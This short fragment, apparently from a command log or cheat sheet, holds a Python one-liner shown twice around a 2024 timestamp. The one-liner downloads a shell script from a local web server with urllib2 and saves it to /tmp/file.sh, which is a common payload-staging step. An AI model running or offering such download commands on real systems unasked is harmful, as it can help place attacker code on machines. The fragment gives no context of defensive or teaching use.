python -c "with open('/tmp/file.sh', 'wb') as f: import urllib2; f.write(urllib2.urlopen('http://127.0.0.1:80/file.sh').read())"
2024-03-21 11:23:58
python -c "with open('/tmp/file.sh', 'wb') as f: import urllib2; f.write(urllib2.urlopen('http://127.0.0.1:80/file.sh').read())"